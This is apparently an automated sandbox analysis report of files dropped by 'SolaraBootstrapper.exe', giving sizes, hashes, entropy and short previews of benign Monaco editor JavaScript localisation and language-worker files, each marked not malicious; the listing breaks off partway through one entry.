                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/(function(){var ie=["exports","require","vs/base/common/lifecycle","vs/nls","vs/nls!vs/editor/editor.main","vs/editor/common/core/range","vs/base/common/event","vs/base/browser/dom","vs/platform/instantiation/common/instantiation","vs/base/common/errors","vs/css!vs/editor/editor.main","vs/editor/common/core/position","vs/base/common/strings","vs/base/common/arrays","vs/base/common/async","vs/platform/contextkey/common/contextkey","vs/editor/browser/editorExtensions","vs/base/common/platform","vs/editor/common/services/languageFeatures","vs/base/common/cancellation","vs/base/common/types","vs/editor/common/editorContextKeys","vs/base/common/uri","vs/
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (42241)
                                                  Category:dropped
                                                  Size (bytes):120585
                                                  Entropy (8bit):4.947985274209808
                                                  Encrypted:false
                                                  SSDEEP:1536:t84Mc/7/by4xCtVuQ2AhURa51M9falYTu4pO/0VSivNpLFyRASXtAkcRAyy37dHh:t8Uy4xCoOnuTWjzQ3U
                                                  MD5:6BD08563450364CBC987CCD57F00AA5E
                                                  SHA1:0438DDBCFAA4E25743398709E2FB34FFDD0E0401
                                                  SHA-256:C17A7143BFEC45615DFE279453207810386CF2DDB1765BB51D5EF7588E431C59
                                                  SHA-512:CDE6FD753BDB1BB1871D691249A3A44CBF4E1A54D96707A9A8D52C2930CEC8E45AC546221CF293B144CDBC1DAD7176C0EC083A18A2431CE8F731B1268901B379
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/editor/editor.main.nls.de",{"vs/base/browser/ui/actionbar/actionViewItems":["{0} ({1})"],"vs/base/browser/ui/findinput/findInput":["Eingabe"],"vs/base/browser/ui/findinput/findInputToggles":["Gro\xDF-/Kleinschreibung beachten","Nur ganzes Wort suchen","Regul\xE4ren Ausdruck verwenden"],"vs/base/browser/ui/findinput/replaceInput":["Eingabe","Gro\xDF-/Kleinschreibung beibehalten"],"vs/base/browser/ui/hover/hoverWidget":['\xDCberpr\xFCfen Sie dies in der barrierefreien Ansicht mit "{0}".','\xDCberpr\xFCfen Sie dies in der barrierefreien Ansicht \xFCber den Befehl "Barrierefreie Ansicht \xF6ffnen", der zurzeit nicht \xFCber eine Tastenzuordnu
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (42367)
                                                  Category:dropped
                                                  Size (bytes):120935
                                                  Entropy (8bit):4.685804088206268
                                                  Encrypted:false
                                                  SSDEEP:1536:v6bTYMJ6KrgZyxa+q2eqfhRVxX/Z85PIJGJOluS18Cpy27w/PNUfeOBCHTwYu7Ez:v6Se03Y1w4lP8C8XNUfeOBCHTwYus
                                                  MD5:71784F7AD71ADD554B3629F5470D0692
                                                  SHA1:796A222F77085EFD67C8F23507D281FB5531A376
                                                  SHA-256:7EECEC9290D4CE0E6ED84629DB0D4F1FA579BF747DAFDEABA07B0FCCCDBCA260
                                                  SHA-512:868FBD79D01AF384694AA12CE284C861DA91677F9D0668223B1C5C40C9ABF3979506A09466FF5891123228507474BFDEFD72CEFC6BB675AC632F045A95E6C99F
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/editor/editor.main.nls.es",{"vs/base/browser/ui/actionbar/actionViewItems":["{0} ({1})"],"vs/base/browser/ui/findinput/findInput":["entrada"],"vs/base/browser/ui/findinput/findInputToggles":["Coincidir may\xFAsculas y min\xFAsculas","Solo palabras completas","Usar expresi\xF3n regular"],"vs/base/browser/ui/findinput/replaceInput":["entrada","Conservar may/min"],"vs/base/browser/ui/hover/hoverWidget":["Inspeccione esto en la vista accesible con {0}.","Inspeccione esto en la vista accesible mediante el comando Abrir vista accesible, que actualmente no se puede desencadenar mediante el enlace de teclado."],"vs/base/browser/ui/iconLabel/iconL
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (44787)
                                                  Category:dropped
                                                  Size (bytes):132590
                                                  Entropy (8bit):4.841326964831083
                                                  Encrypted:false
                                                  SSDEEP:3072:8iXE5C6UVSSYHxGLrsWwkuJDLZLkjF/ntOkpApBWblyNqAv:8+E5CxVSSYHxGLrsWwkuJDLZLkjF/ntC
                                                  MD5:CE87798DE13EE0DB8D3C93CBD4B71FF3
                                                  SHA1:B2906F0F64437B5FB7E17BFCCC2FA86EB11FCF95
                                                  SHA-256:40CC5F86D28DAC219AD76B3B93217147524E9A586497425FB1C7E8946BDF8D39
                                                  SHA-512:405B32ED300BE9267A6C84987A1060D24783FB0D1396FBFA9B7DB7F5E6FB30F845B017BC602E81A39B1CF3DF0624AB81E853810E6205F3071EB8701A7A9F1735
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/editor/editor.main.nls.fr",{"vs/base/browser/ui/actionbar/actionViewItems":["{0} ({1})"],"vs/base/browser/ui/findinput/findInput":["entr\xE9e"],"vs/base/browser/ui/findinput/findInputToggles":["Respecter la casse","Mot entier","Utiliser une expression r\xE9guli\xE8re"],"vs/base/browser/ui/findinput/replaceInput":["entr\xE9e","Pr\xE9server la casse"],"vs/base/browser/ui/hover/hoverWidget":["Inspectez ceci dans l\u2019affichage accessible avec {0}.","Inspectez ceci dans l\u2019affichage accessible via la commande Open Accessible View qui ne peut pas \xEAtre d\xE9clench\xE9e via une combinaison de touches pour l\u2019instant."],"vs/base/brow
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (43664)
                                                  Category:dropped
                                                  Size (bytes):122777
                                                  Entropy (8bit):4.5914056633321945
                                                  Encrypted:false
                                                  SSDEEP:3072:OKGy/Bb8cFU25gOUJq2F91J1qn4X5NeEdhkO:OKGy/TgOoq2F91J1qn4X5N/h
                                                  MD5:DE2806331A04CDE2CCD83E24E66D8AEC
                                                  SHA1:05C726AFB6FBDBAFC3C589C35EF2F5BC4746F226
                                                  SHA-256:4415CBA01EF4ECC312385A39F3D6F43AD6C3C8B33ACB9CBF0C0B95A3A21B352A
                                                  SHA-512:95BC6B5D106B14FA5E512110142E60D61A37A37AC5FD3FD15A9BBD0CAA8C00DE0731351E171AD5EBF8DC7B82A3EC9BA87FE5BF371A98DDB99D99C60D8452A407
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/editor/editor.main.nls.it",{"vs/base/browser/ui/actionbar/actionViewItems":["{0} ({1})"],"vs/base/browser/ui/findinput/findInput":["input"],"vs/base/browser/ui/findinput/findInputToggles":["Maiuscole/minuscole","Parola intera","Usa espressione regolare"],"vs/base/browser/ui/findinput/replaceInput":["input","Mantieni maiuscole/minuscole"],"vs/base/browser/ui/hover/hoverWidget":["Ispezionarlo nella visualizzazione accessibile con {0}.","Ispezionarlo nella visualizzazione accessibile tramite il comando Apri visualizzazione accessibile che attualmente non \xE8 attivabile tramite il tasto di scelta rapida."],"vs/base/browser/ui/iconLabel/iconL
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (37895)
                                                  Category:dropped
                                                  Size (bytes):248590
                                                  Entropy (8bit):4.103026864780491
                                                  Encrypted:false
                                                  SSDEEP:3072:b09KeywS3HZmYLPP/qqvYA3y3HFKi03vuPPWffQvCEwmGX1qs2HESNJ9Bg6rf8vg:b0QeV2APfaEwNqs2HESNHBg6rfIZS
                                                  MD5:66266DBB1DBAC1A55417DC3BCD4F76CA
                                                  SHA1:553F3CF7D1FB64E6BD3FC258CA263E14561299C1
                                                  SHA-256:7FFA7603CB71B964D6EED22F604C51BBEFBE560FCDCD309E2668D74B6082EEA3
                                                  SHA-512:515C6A8708A7C1985C67F483BD31C24E2136F78CCD1C010F4D736A97EE9A82259E87BCDD4B4EC5EB4F5516D5D781533C01B4B33171570DF0797C5F8FF155EE99
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/editor/editor.main.nls.ja",{"vs/base/browser/ui/actionbar/actionViewItems":["{0} ({1})"],"vs/base/browser/ui/findinput/findInput":["\u5165\u529B"],"vs/base/browser/ui/findinput/findInputToggles":["\u5927\u6587\u5B57\u3068\u5C0F\u6587\u5B57\u3092\u533A\u5225\u3059\u308B","\u5358\u8A9E\u5358\u4F4D\u3067\u691C\u7D22\u3059\u308B","\u6B63\u898F\u8868\u73FE\u3092\u4F7F\u7528\u3059\u308B"],"vs/base/browser/ui/findinput/replaceInput":["\u5165\u529B","\u4FDD\u6301\u3059\u308B"],"vs/base/browser/ui/hover/hoverWidget":["{0} \u3092\u4F7F\u7528\u3057\u3066\u3001\u30E6\u30FC\u30B6\u30FC\u88DC\u52A9\u5BFE\u5FDC\u306E\u30D3\u30E5\u30FC\u3067\u3053\u308C\
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (34260)
                                                  Category:dropped
                                                  Size (bytes):96161
                                                  Entropy (8bit):4.746330637275266
                                                  Encrypted:false
                                                  SSDEEP:1536:EbYdRy64vmFxsnLqWkYKqkSJHVepbXqZGD:Ese6+aWERbgGD
                                                  MD5:E856E8CB66EA2DD27483F82FCBC923B8
                                                  SHA1:20BDCDDF8838E09A317A66F763830DAFD200409A
                                                  SHA-256:76882F9F1CA076A810CC44891FC00E6C3922D51D8C2D41C5093B016EEAA401CD
                                                  SHA-512:F189758BC0B42644D9452DC49BF91C0CFB8196052E17A89DA50F4AD32FBCFE317FB51B95782EA8FF9F57522E6E8BA81C2343DF46DB5C06BB6A5F6719B765199D
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/editor/editor.main.nls",{"vs/base/browser/ui/actionbar/actionViewItems":["{0} ({1})"],"vs/base/browser/ui/findinput/findInput":["input"],"vs/base/browser/ui/findinput/findInputToggles":["Match Case","Match Whole Word","Use Regular Expression"],"vs/base/browser/ui/findinput/replaceInput":["input","Preserve Case"],"vs/base/browser/ui/hover/hoverWidget":["Inspect this in the accessible view with {0}.","Inspect this in the accessible view via the command Open Accessible View which is currently not triggerable via keybinding."],"vs/base/browser/ui/iconLabel/iconLabelHover":["Loading..."],"vs/base/browser/ui/inputbox/inputBox":["Error: {0}","Wa
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (33640)
                                                  Category:dropped
                                                  Size (bytes):205419
                                                  Entropy (8bit):4.345887338395298
                                                  Encrypted:false
                                                  SSDEEP:1536:zY/SJerStsyiGgOqomKaWQteqQ+LtXlcxSc8ts:zY/SJVo/omKaW1+Lc
                                                  MD5:8032847C134D186D4D4BC11FBA7C7E7A
                                                  SHA1:DAD9EC2AB130A829D446E9EFC0C7B3D0FC3BFEE7
                                                  SHA-256:67329CA30FE98668B295DCFD19FCFB8958815E56342E750655D9AEB876878847
                                                  SHA-512:199D31E182BE28032AB25E0E7B0A12F5E43C09DF6BAC05746C387DDAC76E41B96980FB83DA3EE0ACA4C36AFB05E6D2C0419A958476DBA6DDE0563A1DA242A5DA
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/editor/editor.main.nls.ko",{"vs/base/browser/ui/actionbar/actionViewItems":["{0}({1})"],"vs/base/browser/ui/findinput/findInput":["\uC785\uB825"],"vs/base/browser/ui/findinput/findInputToggles":["\uB300/\uC18C\uBB38\uC790 \uAD6C\uBD84","\uB2E8\uC5B4 \uB2E8\uC704\uB85C","\uC815\uADDC\uC2DD \uC0AC\uC6A9"],"vs/base/browser/ui/findinput/replaceInput":["\uC785\uB825","\uB300/\uC18C\uBB38\uC790 \uBCF4\uC874"],"vs/base/browser/ui/hover/hoverWidget":["{0}\uC744(\uB97C) \uC0AC\uC6A9\uD558\uC5EC \uC811\uADFC\uC131 \uBCF4\uAE30\uC5D0\uC11C \uC774\uB97C \uAC80\uC0AC\uD569\uB2C8\uB2E4.","\uD604\uC7AC \uD0A4 \uBC14\uC778\uB529\uC744 \uD1B5\uD574 \uD2B8
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (65256)
                                                  Category:dropped
                                                  Size (bytes):512190
                                                  Entropy (8bit):3.409453617012253
                                                  Encrypted:false
                                                  SSDEEP:384:hBi0XabI1Z2da5y+kjn17ZrTUP74318KyttyHAUvx/ANtavPCvHyhrDLOHZ:ziomdh7f/8KIUgavPKHjZ
                                                  MD5:E33A2DB9AC2082189C6D7BE83A23EE01
                                                  SHA1:28FA0F79125C500B3D53D2E9E9212D4EF002F3A6
                                                  SHA-256:E217A9B5823906A09E8CA0204A614319AA03607B54836FD9C616FCBFEC8861CD
                                                  SHA-512:DBE3D3A4E6D618308A97C856DBFF22CA9F768D476EBAC3CDF7349A294E9B68D5EE53EE1A95DA5122DE9DF6A8D1EC8B03506F027DDF05309CDFE14589763FF01E
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/editor/editor.main.nls.ru",{"vs/base/browser/ui/actionbar/actionViewItems":["{0} ({1})"],"vs/base/browser/ui/findinput/findInput":["\u0432\u0445\u043E\u0434\u043D\u044B\u0435 \u0434\u0430\u043D\u043D\u044B\u0435"],"vs/base/browser/ui/findinput/findInputToggles":["\u0421 \u0443\u0447\u0435\u0442\u043E\u043C \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430","\u0421\u043B\u043E\u0432\u043E \u0446\u0435\u043B\u0438\u043A\u043E\u043C","\u0418\u0441\u043F\u043E\u043B\u044C\u0437\u043E\u0432\u0430\u0442\u044C \u0440\u0435\u0433\u0443\u043B\u044F\u0440\u043D\u043E\u0435 \u0432\u044B\u0440\u0430\u0436\u0435\u043D\u0438\u0435"],"vs/base/browser/ui/
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (40875)
                                                  Category:dropped
                                                  Size (bytes):156056
                                                  Entropy (8bit):4.447840061328009
                                                  Encrypted:false
                                                  SSDEEP:3072:RuZssuS8LFLbssbnEOTkh8iPbT6UwdFu/XcoR6+DNWnxrodZNIPQuHyyuHvl33QR:RuOsuS8LFLbssbni8iPbT6UwdFu/Xcoq
                                                  MD5:F5D2299434D75FD3EF381520A7942A9D
                                                  SHA1:9F14138C8C47B1EF3F2883FABE46C8553F0EEB41
                                                  SHA-256:43F6B0598C4492D89246F357D3DCA7CC8BFA6A5E100588C9566BC6F5C8E144DF
                                                  SHA-512:BEEA0ECB22107B9F449FD73FC1DD1F6D510CCCD7D1E34177978CAE906CB0759AA05BD4EAC5FF8FE9206F75A116F89659717E08C89A7D0D51F21B4A2693946FD0
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/editor/editor.main.nls.zh-cn",{"vs/base/browser/ui/actionbar/actionViewItems":["{0} ({1})"],"vs/base/browser/ui/findinput/findInput":["\u8F93\u5165"],"vs/base/browser/ui/findinput/findInputToggles":["\u533A\u5206\u5927\u5C0F\u5199","\u5168\u5B57\u5339\u914D","\u4F7F\u7528\u6B63\u5219\u8868\u8FBE\u5F0F"],"vs/base/browser/ui/findinput/replaceInput":["\u8F93\u5165","\u4FDD\u7559\u5927\u5C0F\u5199"],"vs/base/browser/ui/hover/hoverWidget":["\u5728\u8F85\u52A9\u89C6\u56FE\u4E2D\u7528 {0} \u68C0\u67E5\u6B64\u9879\u3002","\u901A\u8FC7\u547D\u4EE4\u201C\u6253\u5F00\u8F85\u52A9\u89C6\u56FE\u201D\u5728\u8F85\u52A9\u89C6\u56FE\u4E2D\u68C0\u67E5\u6B64
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (40746)
                                                  Category:dropped
                                                  Size (bytes):159246
                                                  Entropy (8bit):4.461787497354141
                                                  Encrypted:false
                                                  SSDEEP:3072:RFwTmchBa88aTKkO+VfjEtIzz+8o6yrlluOg38rI2ouGFJlngTn/oo3lkA97XO6n:RFSmEa88aTKkO+VfjEtIv+8o6yrlluOV
                                                  MD5:C7A5C4564274089F5C1A17F0DA4EB8A1
                                                  SHA1:467F1B3F6B2B7155159FC4A9147B8BF88A74C679
                                                  SHA-256:E3C5FA966E4B589FEFC683383BFEB92ECB5684EBB67B0F9EA3D2ABE51FA5D083
                                                  SHA-512:CF064B4749C766B153B8FB4EC6AF038E75E66099FB2031418352B1496CDB51661625AEBC12011DE3C7D0A9A7AF0CC6F7972A61A760FF1EA2A38B9C869A4E1DDB
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/vscode/blob/main/LICENSE.txt. *-----------------------------------------------------------*/define("vs/editor/editor.main.nls.zh-tw",{"vs/base/browser/ui/actionbar/actionViewItems":["{0} ({1})"],"vs/base/browser/ui/findinput/findInput":["\u8F38\u5165"],"vs/base/browser/ui/findinput/findInputToggles":["\u5927\u5C0F\u5BEB\u9808\u76F8\u7B26","\u5168\u5B57\u62FC\u5BEB\u9808\u76F8\u7B26","\u4F7F\u7528\u898F\u5247\u904B\u7B97\u5F0F"],"vs/base/browser/ui/findinput/replaceInput":["\u8F38\u5165","\u4FDD\u7559\u5927\u5C0F\u5BEB"],"vs/base/browser/ui/hover/hoverWidget":["\u4F7F\u7528 {0} \u5728\u53EF\u5B58\u53D6\u6AA2\u8996\u4E2D\u6AA2\u67E5\u6B64\u9805\u76EE\u3002","\u900F\u904E\u76EE\u524D\u7121\u6CD5\u900F\u904E\u6309\u9375\u7E6B\u7D50\u95DC\u4FC2
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (22168)
                                                  Category:dropped
                                                  Size (bytes):34290
                                                  Entropy (8bit):5.148121198098938
                                                  Encrypted:false
                                                  SSDEEP:768:1TdhLLs17kT2fyWNbR0C6pM38fDs5fhfK4m4g1KOMbxboqqNdImiuN8FCIgaz4:xdhLLs17kT2fyWNbR0C6O8fI5pf/g1KO
                                                  MD5:F745889C28BFA41DC4638ABD76BC63A0
                                                  SHA1:B0B1A018CD38D8FFA4F7AD3D6CA9C8CA98F03783
                                                  SHA-256:CCFE978A6FF7AE2044D817F846FF0E157B9C088BAD6ED504E257975BE5CDBC90
                                                  SHA-512:4120430F11620926201BE6CA6D83E77EABA12ABADC898DDA31112F5EED8F0CFA110D824DDB19E71DABAA7F871261279A2D1FDD0AD5EDAA72FAF6EB360038DDF7
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/language/css/cssMode", ["require","require"],(require)=>{.var moduleExports=(()=>{var en=Object.create;var Y=Object.defineProperty;var nn=Object.getOwnPropertyDescriptor;var tn=Object.getOwnPropertyNames;var rn=Object.getPrototypeOf,on=Object.prototype.hasOwnProperty;var sn=(n=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(n,{get:(t,i)=>(typeof require!="undefined"?require:t)[i]}):n)(function(n){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+n+'" is not supported')});var an=(n,t)=>()=>(t||n((t={exp
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (56978)
                                                  Category:dropped
                                                  Size (bytes):776551
                                                  Entropy (8bit):5.133064010019546
                                                  Encrypted:false
                                                  SSDEEP:6144:4iU561RpkfrQxEXMfGEGUREYQ4CgC4q5mL6rQN77EPIkRxIjPNlObQp6RxIjPNlX:4iUgVECEY/FpbTGMlJ
                                                  MD5:DBE76882780275B00F45EEAAB8EBE525
                                                  SHA1:2CD94B0E7BBC96A65A4868AF2D06A0511D454B37
                                                  SHA-256:F81E2ADF4A550E3D89038A64EF1BD32C0ACCA59C7D7732A461E5736A02312859
                                                  SHA-512:08A6E2C7C4631BEC87EA2B1AFA8CABC5509F43A0EE905FA151F86F13E1617AD1DF2D7D17599079A221D70DF687ACC0C42275724B766A73DF0567BD1164B32BF0
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/language/css/cssWorker", ["require","require"],(require)=>{.var moduleExports=(()=>{var $n=Object.defineProperty;var ds=Object.getOwnPropertyDescriptor;var hs=Object.getOwnPropertyNames;var ps=Object.prototype.hasOwnProperty;var us=(n,e)=>{for(var t in e)$n(n,t,{get:e[t],enumerable:!0})},ms=(n,e,t,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let i of hs(e))!ps.call(n,i)&&i!==t&&$n(n,i,{get:()=>e[i],enumerable:!(r=ds(e,i))||r.enumerable});return n};var fs=n=>ms($n({},"__esModule",{value:!0}),n);var sl={};us(sl,{CSSWorker:()=>Vn,create:()=>ol});var d;(function(n){n[n.Ident=
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (22185)
                                                  Category:dropped
                                                  Size (bytes):34826
                                                  Entropy (8bit):5.1514142212484595
                                                  Encrypted:false
                                                  SSDEEP:768:VXtzaTmFu7CY3z/Z9iOC6PP+oqpc0BbbCvJOgFIOgv/tqANdIROg5FHvgYnk:JtzaTmFu7CY3z/Z9iOC6nqprpb7gFIOS
                                                  MD5:BEBB50C47D36FA8DA0A6C213A2AA8A81
                                                  SHA1:9C3BA8FEEDE7B340C4405199C42A12418A1B0F27
                                                  SHA-256:C00B1F2F6065C5022D60D8C46828CB726834E9D3A455BDC89780D41748B3B26C
                                                  SHA-512:A5920563B31F9A6612E08E04205FF559EE2A5605247C6C310532EAA66906C8BB541D1B811F421D296CC85F5FAC6748F7E4833BE9A44AEDB129A4E61449CD2844
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/language/html/htmlMode", ["require","require"],(require)=>{.var moduleExports=(()=>{var nn=Object.create;var Q=Object.defineProperty;var tn=Object.getOwnPropertyDescriptor;var rn=Object.getOwnPropertyNames;var on=Object.getPrototypeOf,sn=Object.prototype.hasOwnProperty;var an=(n=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(n,{get:(t,i)=>(typeof require!="undefined"?require:t)[i]}):n)(function(n){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+n+'" is not supported')});var un=(n,t)=>()=>(t||n((t={e
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (29832)
                                                  Category:dropped
                                                  Size (bytes):445890
                                                  Entropy (8bit):5.308476409497889
                                                  Encrypted:false
                                                  SSDEEP:6144:LE/xGvIWtISKIGMviS6cryT7xDiTvZErkBzsppmDWSKZZg4LLoVxpmZG6M:LQBMHFyT7wTvZ9spY1Y4
                                                  MD5:0A3EF149B462E2EFFFB3FC5760F70CAD
                                                  SHA1:6FEB219B4258D345760D508FD89972E4F7B3FF0F
                                                  SHA-256:8C8F5BDBDB7B31CD16CDBDFFBF99AAEDBA8790B3016E7156F18D5BAA8A33C37E
                                                  SHA-512:0E0CDD2CDA741A50695A9C9CA4E76C442538206E1E9442D0628AF5546FEAFEE222AD815EA8DAD5372978CD7480E7D02812686B341527F2A3A0A9D3593FE228E7
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/language/html/htmlWorker", ["require","require"],(require)=>{.var moduleExports=(()=>{var Xe=Object.defineProperty;var xn=Object.getOwnPropertyDescriptor;var Dn=Object.getOwnPropertyNames;var En=Object.prototype.hasOwnProperty;var Cn=(t,i)=>{for(var o in i)Xe(t,o,{get:i[o],enumerable:!0})},Ln=(t,i,o,n)=>{if(i&&typeof i=="object"||typeof i=="function")for(let e of Dn(i))!En.call(t,e)&&e!==o&&Xe(t,e,{get:()=>i[e],enumerable:!(n=xn(i,e))||n.enumerable});return t};var Mn=t=>Ln(Xe({},"__esModule",{value:!0}),t);var Ri={};Cn(Ri,{HTMLWorker:()=>Je,create:()=>Mi});function Rn(t,i){let o;ret
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (22282)
                                                  Category:dropped
                                                  Size (bytes):40280
                                                  Entropy (8bit):5.2120048185170855
                                                  Encrypted:false
                                                  SSDEEP:768:m1xy5SyJXG86eBobgC6R38qLqX08NwErOqPxzO6ADZWOJ5P/jZ7iMogBlfS47FLs:m1xy5SyJXG86eBobgC6RsqLqEoOUO/PA
                                                  MD5:EC67857A52845514B6C8D064D4FB5A2F
                                                  SHA1:9591B312E7E942D992F3931D58487794101DE2A2
                                                  SHA-256:76AC56F40DC8FF457D7033EA2EA06BBB82AC89EFA1B8E8A37609A40CC0E4950D
                                                  SHA-512:B50B535D28A7903A8F051D99FDE73B0FC624BF82415D898577D9FF1E40317865E5F9708FE227864A0A30E710D813E113011E976329258047BA79BDD4EFB69E00
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/language/json/jsonMode", ["require","require"],(require)=>{.var moduleExports=(()=>{var Tn=Object.create;var ie=Object.defineProperty;var bn=Object.getOwnPropertyDescriptor;var Cn=Object.getOwnPropertyNames;var wn=Object.getPrototypeOf,In=Object.prototype.hasOwnProperty;var xn=(e=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(e,{get:(t,i)=>(typeof require!="undefined"?require:t)[i]}):e)(function(e){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+e+'" is not supported')});var En=(e,t)=>()=>(t||e((t={
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (29891)
                                                  Category:dropped
                                                  Size (bytes):128871
                                                  Entropy (8bit):5.377103877688578
                                                  Encrypted:false
                                                  SSDEEP:1536:kuTrGk9g+mZRjk3f7rsPPnD39yKqaGL52So2tG2:kCQA3UPPnDboF
                                                  MD5:0B85DFFC548CCE9F63EC3131A065DBB7
